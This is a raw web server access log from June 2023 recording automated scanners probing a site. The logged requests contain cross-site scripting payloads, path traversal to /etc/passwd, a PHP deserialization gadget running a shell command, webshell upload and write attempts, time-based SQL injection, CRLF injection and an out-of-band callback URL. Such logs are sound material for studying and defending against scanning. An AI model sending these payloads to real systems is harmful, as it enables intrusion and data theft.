107.189.31.184 - - [17/Jun/2023:12:42:33 +0530] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:12:42:34 +0530] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:12:42:35 +0530] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:12:42:36 +0530] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:12:42:37 +0530] "GET /magmi/web/info.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:12:42:38 +0530] "GET /magmi/web/info.php HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:12:42:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:43:14 +0530] "GET /index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:43:15 +0530] "GET /index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 HTTP/1.1" 404 1012
198.144.159.126 - - [17/Jun/2023:12:44:23 +0530] "CONNECT cn.bing.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:44:43 +0530] "GET /plugin HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:12:44:43 +0530] "GET /plugin HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:12:45:56 +0530] "GET /wp-content/plugins/email-subscribers HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:12:45:57 +0530] "GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2RHotzwg5hQu80yHOAsNnxgAAph')%3elujb7/admin/imgProcess.cfm HTTP/1.1" 404 1202
107.189.31.184 - - [17/Jun/2023:12:45:57 +0530] "GET /wp-content/plugins/email-subscribers HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:12:45:58 +0530] "GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2RHotzwg5hQu80yHOAsNnxgAAph')%3elujb7/admin/imgProcess.cfm HTTP/1.1" 404 1202
107.189.31.184 - - [17/Jun/2023:12:45:59 +0530] "GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2RHotzwg5hQu80yHOAsNnxgAAph')%3elujb7/admin/imgProcess.cfm HTTP/1.1" 404 1214
107.189.31.184 - - [17/Jun/2023:12:46:00 +0530] "GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2RHotzwg5hQu80yHOAsNnxgAAph')%3elujb7/admin/imgProcess.cfm HTTP/1.1" 404 1214
41.186.73.134 - - [17/Jun/2023:12:46:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:46:05 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:12:46:06 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:12:46:07 +0530] "GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:12:46:08 +0530] "GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1" 404 1034
41.186.73.134 - - [17/Jun/2023:12:47:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:50:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:51:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
143.110.182.33 - - [17/Jun/2023:12:51:43 +0530] "GET /aaa9 HTTP/1.1" 404 1002
143.110.182.33 - - [17/Jun/2023:12:52:00 +0530] "GET /aab8 HTTP/1.1" 404 1002
143.110.182.33 - - [17/Jun/2023:12:52:15 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:12:54:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:54:55 +0530] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:12:54:55 +0530] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:12:54:57 +0530] "GET /seeyon/test123456.jsp?2RHothrg27gspwcK8NqtzrgZZ77=ipconfig&pwd=asasd3344 HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:12:54:57 +0530] "GET /seeyon/test123456.jsp?2RHothrg27gspwcK8NqtzrgZZ77=ipconfig&pwd=asasd3344 HTTP/1.1" 404 1036
41.186.73.134 - - [17/Jun/2023:12:55:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:56:23 +0530] "POST /axis2-admin/login HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:56:26 +0530] "POST /axis2-admin/login HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:56:26 +0530] "POST /axis2/axis2-admin/login HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:12:56:28 +0530] "POST /axis2/axis2-admin/login HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:12:56:45 +0530] "GET /index.php?c=api&format=php&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&m=data2 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:56:45 +0530] "GET /index.php?c=api&format=php&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&m=data2 HTTP/1.1" 404 1012
198.235.24.8 - - [17/Jun/2023:12:56:53 +0530] "GET / HTTP/1.0" 200 11230
107.189.31.184 - - [17/Jun/2023:12:57:13 +0530] "GET /index.php?data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==&r=test/sss HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:57:14 +0530] "GET /index.php?data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==&r=test/sss HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:12:58:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:59:26 +0530] "GET /script/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:12:59:27 +0530] "GET /script/ HTTP/1.1" 404 1008
41.186.73.134 - - [17/Jun/2023:12:59:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:59:56 +0530] "GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:12:59:56 +0530] "GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:13:01:15 +0530] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:01:16 +0530] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:01:46 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:13:01:47 +0530] "POST / HTTP/1.1" 200 11250
45.128.232.141 - - [17/Jun/2023:13:02:59 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:13:03:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:03:13 +0530] "GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:13:03:13 +0530] "GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:13:04:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:05:36 +0530] "GET /admin/install/install.php HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:13:05:36 +0530] "GET /admin/install/install.php HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:13:05:47 +0530] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:13:05:47 +0530] "GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:13:05:47 +0530] "GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:13:05:48 +0530] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 1054
41.186.73.134 - - [17/Jun/2023:13:07:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:08:30 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:13:08:32 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:13:08:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:09:26 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:13:09:27 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:13:10:01 +0530] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:13:10:01 +0530] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:13:11:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:12:44 +0530] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:13:12:44 +0530] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:13:12:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:13:24 +0530] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:13:13:24 +0530] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%27%2Balert%281%29%2B%27x&searchType=Simple HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:13:13:25 +0530] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F&searchType=Simple HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:13:13:25 +0530] "GET /NetBiblio/search/shortview?searchField=W&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F&searchType=Simple HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:13:14:09 +0530] "GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 404 1186
107.189.31.184 - - [17/Jun/2023:13:14:09 +0530] "GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 404 1186
199.195.248.153 - - [17/Jun/2023:13:14:13 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:13:14:36 +0530] "GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==&popup_shortcode_key=inpost_fancy HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:13:14:37 +0530] "GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==&popup_shortcode_key=inpost_fancy HTTP/1.1" 404 1040
45.128.232.67 - - [17/Jun/2023:13:15:43 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:13:16:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:17:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:20:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:21:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:24:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:25:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:26:21 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:13:26:23 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:13:26:23 +0530] "GET /.dockercfg HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:13:26:24 +0530] "GET /.dockercfg HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:13:26:25 +0530] "GET /.docker/config.json HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:13:26:26 +0530] "GET /.docker/config.json HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:13:28:21 +0530] "GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1" 404 1166
107.189.31.184 - - [17/Jun/2023:13:28:21 +0530] "GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1" 404 1166
41.186.73.134 - - [17/Jun/2023:13:28:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.108 - - [17/Jun/2023:13:29:01 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:13:29:01 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:13:29:06 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:13:29:06 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:13:29:11 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.108 - - [17/Jun/2023:13:29:11 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:13:29:16 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:13:29:16 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:13:29:36 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:13:29:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:13:29:38 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:13:29:39 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:13:29:40 +0530] "GET /wp-admin/ HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:29:41 +0530] "GET /wp-admin/ HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:30:04 +0530] "GET /include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:13:30:04 +0530] "GET /include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1044
41.186.73.134 - - [17/Jun/2023:13:30:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:31:33 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:31:34 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment HTTP/1.1" 404 1012
92.204.128.155 - - [17/Jun/2023:13:31:44 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:13:33:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:34:00 +0530] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:34:00 +0530] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:13:34:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:34:33 +0530] "GET /admin/index.php?cmd=mkfile&name=2RHotjb20BFrPulQA7B2RYQaEjp.php&op=elfinder&p=ajax-ops&target=l1_Lw HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:13:34:33 +0530] "GET /admin/index.php?cmd=mkfile&name=2RHotjb20BFrPulQA7B2RYQaEjp.php&op=elfinder&p=ajax-ops&target=l1_Lw HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:13:36:40 +0530] "GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%222RHotojKjkK6R8GA2fS9NAlRGD6.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:36:41 +0530] "GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%222RHotojKjkK6R8GA2fS9NAlRGD6.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:36:42 +0530] "GET /2RHotojKjkK6R8GA2fS9NAlRGD6.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:13:36:43 +0530] "GET /2RHotojKjkK6R8GA2fS9NAlRGD6.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:13:37:14 +0530] "POST /pcidss/report?set=1&sid=loginchallengeresponse1requestbody&type=allprofiles&username=nsroot HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:13:37:16 +0530] "GET /menu/ss?force_setup=1&sid=nsroot&username=nsroot HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:13:37:16 +0530] "POST /pcidss/report?set=1&sid=loginchallengeresponse1requestbody&type=allprofiles&username=nsroot HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:13:37:18 +0530] "GET /menu/ss?force_setup=1&sid=nsroot&username=nsroot HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:13:37:18 +0530] "GET /menu/neo HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:13:37:20 +0530] "GET /menu/neo HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:13:37:21 +0530] "GET /menu/stc HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:13:37:22 +0530] "GET /menu/stc HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:13:37:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:38:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:39:29 +0530] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:13:39:29 +0530] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 1028
45.128.232.141 - - [17/Jun/2023:13:41:10 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:13:41:47 +0530] "GET /node_modules/../../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:13:41:48 +0530] "GET /node_modules/../../../../../etc/passwd HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:13:42:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:43:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:46:13 +0530] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:13:46:14 +0530] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:13:46:16 +0530] "GET /wp-json/rps_result/v1/route/search_student?batch_id=1&department_id=1 HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:13:46:16 +0530] "GET /wp-json/rps_result/v1/route/search_student?batch_id=1&department_id=1 HTTP/1.1" 404 1078
41.186.73.134 - - [17/Jun/2023:13:46:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:46:57 +0530] "GET /admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:13:46:58 +0530] "GET /admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ HTTP/1.1" 404 1058
41.186.73.134 - - [17/Jun/2023:13:47:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:49:26 +0530] "GET /action/usermanager.htm HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:13:49:26 +0530] "GET /action/usermanager.htm HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:13:49:31 +0530] "GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272RHotnSj9RVoDoGx5tsRYps9b98%27)%3C/script%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:13:49:31 +0530] "GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272RHotnSj9RVoDoGx5tsRYps9b98%27)%3C/script%3E HTTP/1.1" 404 1008
41.186.73.134 - - [17/Jun/2023:13:50:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:13:51:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:54:51 +0530] "GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&id=1 HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:13:54:52 +0530] "GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&id=1 HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:13:54:53 +0530] "GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:13:54:54 +0530] "GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1098
41.186.73.134 - - [17/Jun/2023:13:54:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:55:22 +0530] "GET /perl-status HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:13:55:23 +0530] "GET /perl-status HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:13:55:52 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_datafeeds HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:13:55:52 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_datafeeds HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:13:56:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:58:14 +0530] "GET /slurm/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:13:58:15 +0530] "GET /slurm/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:13:58:42 +0530] "GET /wp-login.php?wp_lang=en_US%27 HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:13:58:42 +0530] "GET /wp-login.php?wp_lang=en_US%27 HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:13:59:05 +0530] "GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1072
107.189.31.184 - - [17/Jun/2023:13:59:05 +0530] "GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1072
41.186.73.134 - - [17/Jun/2023:13:59:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:13:59:15 +0530] "GET /token.json HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:13:59:16 +0530] "GET /token.json HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:13:59:17 +0530] "GET /search/token.json HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:13:59:18 +0530] "GET /search/token.json HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:14:00:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:03:12 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:14:03:12 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:14:03:14 +0530] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2RHots6h0szR92A59WTAHMEjVlp.jsp HTTP/1.1" 404 1190
107.189.31.184 - - [17/Jun/2023:14:03:15 +0530] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2RHots6h0szR92A59WTAHMEjVlp.jsp HTTP/1.1" 404 1190
41.186.73.134 - - [17/Jun/2023:14:03:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:14:03:54 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:14:03:55 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:14:04:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.108 - - [17/Jun/2023:14:04:25 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:14:04:25 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:14:04:30 +0530] "-" 400 -
